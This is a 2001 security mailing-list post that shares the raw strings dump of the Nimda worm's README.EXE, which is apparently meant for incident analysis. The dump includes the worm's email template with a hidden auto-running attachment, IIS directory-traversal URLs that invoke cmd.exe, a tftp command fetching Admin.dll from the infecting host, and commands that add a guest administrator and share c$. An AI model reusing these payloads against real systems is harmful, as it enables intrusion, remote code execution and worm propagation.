I've done a strings on the README.EXE file and I've attached it AS TEXT for anyone who is interested!

!This program cannot be run in DOS mode. O<Richq .text `.rdata @.data .rsrc @.reloc SVW3 WPWW r?f 6VWh X_^[ 6SVWj _^[u _^[] }VW GGCC GGCC PSh? SSSh VSSS PSSh@ PSSh@ VWh€ j@PW 69ut X[_^ jcY; 6y.VW 6j@h PQPW Pj@VSW PVSSW 6SSW 6_^3 SUVW 6_^]3 6WPWSh WPWSh WPWSh€ 6VWS 6SShP 6VWS 6SSh0 6VWS 6SSh 6VWS 6SSh 6VWS SPh| 6_^[ ;H(}Rh ;A(}X t0A; \u"€} Vh, 6_^[ SVWhD H;L$ GY;~ 9~ v GY;~ r QSPh 6PSj ;Et X_^[ PVVh X_^] SUVW _^][Y SVWjY X_^[ SVW3 Ph~f VPVV Ph~f jc^W 2u€x X_^[ D$u D$<UP D$@hx D$`QPV D$@P D$@h D$@h D$@h D$@h D$@h D$@h D$@h D$@P D$@P _]Vj t`€e @SVW j@P3 F98t C98u WWW |$$3 D$8WP D$Dj €|$< D$\PWh0 D$\P D$\h( D$`YWPh D$\h€ D$\WP l$4uV D$0j |$0€ 9T$,u<; D$ ; u>9T$ u89T$ u89T$ D$\P F9T$ 29T$ 9T$ t D$(u D$\P L$8j QUPS D$\P t$(j l$,UWjfj D$\P D$\P D$TP D$HP D$TPU D$ph D$TP D$HP D$TPU D$`VP D$\P _^][ YuOV X_^[ SVWht PSh0 YYSj&j ^VSP 6SSSSS X_^[ 6j.V QQSV3 6VVj s h€ X_^[ SUVW t$@V !SSj _^][ 6Wh ( 6YWV 6t\h 6tUh( 6tyh WVVV 6_^[ €8au PVh? VVVh8 PVVh PVh? WPWVh WPWVh 6_^[ X_^[ PSh? 
SSSh PSSV PWSV PWSV PWSh 6^9] 6_[t D$@P D$@hx D$`QPV D$@P D$@h D$@h Yu:W D$`QPV WSSj t7SV SQWPV <{}%<-~!</t <@ufj E€j@P Ytg€}€@ta E€VP M€QP 6VuD 6YPS €QVP 6j.V Yv'€>Su"€~ th;Y sa Yv:€>Su5€~ Mu/€~ Tu)€~ Pu#€~ ^[WWW 6Wt| SPSS QSUV3 6uQUPP 6ubht X_^][Y 6YSV PVh0 _WVP PVVVVV X_^[ SVW SVh0 YYVSh VVj t_VVh tE95 PSh0 D$ SPh D$ UP D$ SP 6VSh0 6SUj D$ P D$ VP D$$YP 6SUj YPVW X_^][ SUVW 6WUV dWUV D$`QPV X_^][ X_^[ _WVP PVVVVV Yj&P X_^[ ^@[_ 6j?P PPh,o QSPh SVWj VPVV VPVV 6_^3 6u?h€ tWVS NWVS Eu u7WPS u&WVS E_^[] strncpy memset strcpy strlen strtok memcpy strchr strcat rand strcmp _strlwr strncat srand free sprintf malloc atoi strstr strrchr MSVCRT.dll _initterm _adjust_fdiv GetCurrentThreadId CloseHandle WriteFile SetFilePointer CreateFileA MoveFileExA ReadFile SetFileAttributesA FindClose FindNextFileA FindFirstFileA WriteProcessMemory OpenProcess GetCurrentProcessId lstrcmpiA HeapCompact Sleep GetTickCount SetThreadPriority GetCurrentThread CreateMutexA lstrcpyA GetComputerNameA LocalFree lstrlenA LocalAlloc CreateThread ReleaseMutex WaitForSingleObject GetDriveTypeA GetLogicalDrives GetFileSize CopyFileA GetFileAttributesA SetFileTime GetFileTime EndUpdateResourceA UpdateResourceA SizeofResource LockResource LoadResource FindResourceA FreeLibrary BeginUpdateResourceA LoadLibraryExA DeleteFileA GetTempFileNameA CreateProcessA GetModuleFileNameA GetCurrentDirectoryA GetCommandLineA GetTempPathA GetSystemDirectoryA GetWindowsDirectoryA GetModuleHandleA GetVersionExA GetProcAddress LoadLibraryA GetSystemTime ExitProcess HeapDestroy GetLastError HeapCreate WritePrivateProfileStringA KERNEL32.dll RegCloseKey RegQueryValueExA RegOpenKeyExA RegEnumKeyExA RegCreateKeyExA RegDeleteKeyA RegEnumValueA RegSetValueExA RegQueryValueA ADVAPI32.dll System\CurrentControlSet\Services\VxD\MSTCP NameServer SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\ SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces Concept Virus(CV) V.5, Copyright(C)2001 R.P.China MIME-Version: 
1.0 Content-Type: multipart/related; type="multipart/alternative"; boundary="====_ABC1234567890DEF_====" X-Priority: 3 X-MSMail-Priority: Normal X-Unsent: 1 --====_ABC1234567890DEF_==== Content-Type: multipart/alternative; boundary="====_ABC0987654321DEF_====" --====_ABC0987654321DEF_==== Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable <HTML><HEAD></HEAD><BODY bgColor=3D#ffffff> <iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0> </iframe></BODY></HTML> --====_ABC0987654321DEF_====-- --====_ABC1234567890DEF_==== Content-Type: audio/x-wav; name="readme.exe" Content-Transfer-Encoding: base64 Content-ID: <EA4DMGBP9p> --====_ABC1234567890DEF_==== NUL= [rename] \wininit.ini Personal Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders \*.* €EXPLORER fsdhqherwqi2001 SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Security share c$=c:\ user guest "" localgroup Administrators guest /add localgroup Guests guest /add user guest /active open user guest /add HideFileExt ShowSuperHidden Hidden Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced \\%s %ld %ld %ld %ld %ld Image Space Exec Write Copy Image Space Exec Read/Write Image Space Exec Read Only Image Space Executable Image Space Write Copy Image Space Read/Write Image Space Read Only Image Space No Access Mapped Space Exec Write Copy Mapped Space Exec Read/Write Mapped Space Exec Read Only Mapped Space Executable Mapped Space Write Copy Mapped Space Read/Write Mapped Space Read Only Mapped Space No Access Reserved Space Exec Write Copy Reserved Space Exec Read/Write Reserved Space Exec Read Only Reserved Space Executable Reserved Space Write Copy Reserved Space Read/Write Reserved Space Read Only Reserved Space No Access Process Address Space Exec Write Copy Exec Read/Write Exec Read Only Executable Write Copy Read/Write Read Only No Access Image User PC Thread Details ID Thread Priority Current Context Switches/sec Start Address Thread Page Faults/sec 
Virtual Bytes Peak Virtual Bytes Private Bytes ID Process Elapsed Time Priority Base Working Set Peak Working Set % User Time % Privileged Time % Processor Time Process Counter 009 software\microsoft\windows nt\currentversion\perflib\009 Counters Version Last Counter software\microsoft\windows nt\currentversion\perflib /scripts /MSADC /scripts/..%255c.. /_vti_bin/..%255c../..%255c../..%255c.. /_mem_bin/..%255c../..%255c../..%255c.. /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c.. /scripts/..%c1%1c.. /scripts/..%c0%2f.. /scripts/..%c0%af.. /scripts/..%c1%9c.. /scripts/..%%35%63.. /scripts/..%%35c.. /scripts/..%25%35%63.. /scripts/..%252f.. /root.exe?/c+ /winnt/system32/cmd.exe?/c+ net%%20use%%20\\%s\ipc$%%20""%%20/user:"guest" tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20 Admin.dll c:\Admin.dll d:\Admin.dll e:\Admin.dll <html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html> /Admin.dll GET %s HTTP/1.0 Host: www Connnection: close readme main index default html .asp .htm \readme.eml .exe winzip32.exe riched20.dll .nws .eml .doc .exe dontrunold ioctlsocket gethostbyname gethostname inet_ntoa inet_addr ntohl htonl ntohs htons closesocket select sendto send recvfrom recv bind connect socket __WSAFDIsSet WSACleanup WSAStartup ws2_32.dll MAPILogoff MAPISendMail MAPIFreeBuffer MAPIReadMail MAPIFindNext MAPIResolveName MAPILogon MAPI32.DLL WNetAddConnection2A WNetCancelConnection2A WNetOpenEnumA WNetEnumResourceA WNetCloseEnum MPR.DLL ShellExecuteA SHELL32.DLL RegisterServiceProcess VirtualFreeEx VirtualQueryEx VirtualAllocEx VirtualProtectEx CreateRemoteThread HeapCompact HeapFree HeapAlloc HeapDestroy HeapCreate KERNEL32.DLL SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\ SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths Type Remark SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\X$ Parm2enc Parm1enc Flags Path SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\ 
SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan SYSTEM\CurrentControlSet\Services\lanmanserver\Shares Cache Software\Microsoft\Windows\CurrentVersion\Explorer\MapMail QUIT Subject: From: < DATA RCPT TO: < MAIL FROM: < HELO aabbcc -dontrunold NULL \readme*.exe admin.dll qusery9bnow -qusery9bnow \mmc.exe \riched20.dll boot Shell explorer.exe load.exe -dontrunold \system.ini \load.exe octet wwwwwp pwlo wwww wwwwwwwwwwx wwwwwwx wwwwx wwwx lffffff ffff H|f €ffff CCCCCC CCCCCCCCC NPAD PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX %0C0Q0_0m0 1&1g1 2i2s2 2I3V3d3s3 4i5€5 6Y6~6 7.7H7{7 8>8J8`8e8 9!9@9W9 :!:[:d:o: ;O;U;k; <&=2=8=E=O=^=j= =>">)>.>E>^> ?)?0?5?@?M?T?]?|? 0'0/0C0 1!1*111:1A1J1Y1q1v1}1 1'2K2 3-343S3a3 4.494?4Q4Y4c4o4u4|4 5,515D5I5Z5_5p5u5 6,616D6I6Y6^6o6€6 7&7+7>7C7S7X7h7m7}7 8(8-8@8E8U8Z8j8o8 9*9/9B9G9W9\9l9q9 ;8;A;_;h;v; <T<d< >2>U>~> ?!?(?/?Q?X?q? 0'030?0X0}0 2<2W2t2 203I3k3~3 4+464B4U4{4 45,5>5P5b5q5 5.646H6g6n6}6 7?7Q7V7 8!8-8:8F8L8q8 929D9O9T9Z9m9v9 <5<?<M<`<f<y< =2=O=h= >">,>@>Q>W>i>v> ?&?6?W?u? 0.0;0R0v0 02171=1Q1W1d1o1v1 2+20262A2U2`2 2.3?3V3\3k3 4$494K4a4v4 5.575J5P5u5{5 6F6k6 777}7 8-848A8N8g8w8 9 9(9-9<9D9P9X9d9l9y9 9":3:=:B:K:W:\:d:i:o:v:{: ;#;(;1;?;G;L;U;\;d;i;o;v;{; <#<(<.<5<:<C<N<V<[<a<h<m<s<z< =!='=.=3=9=@=E=K=R=W=]=d=i=o=v={= >.>J>v> ?.?J?\?m? :0E0Z0x0 1)1D1{1 2&272M2d2 4!4*4@4F4O4 5-5B5R5[5o5y5 6&6I6S6e6€6 707b7 8%8:8E8R8 9*979P9p9 :7:=:F:N:X:a:m:u:|: ;;;L;o; <N<Y<k< =N=y= >+>1>Q>^>f>l>w> ?5?>?W?_?p? 141N1W1 1b2{2 3.3^3d3k3 41474B4H4V4^4e4j4p4 5)5>5F5R5Z5i5v5|5 6!6n6 7)757X7m7x7 8;8F8K8R8W8]8c8 9 9F9L9[9d9v9€9 ;(;8;>;m; <!<.<9<@<_<q< =+=1=y= >V>\>r>x> ?#?;?B?M?T?z? 
0v0~0 1 1'141K1d1j1~1 1#2B2`2t2 3%373I3t3{3 4 4+484@4N4S4X4]4h4u4 465R5

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 13:28:53 PDT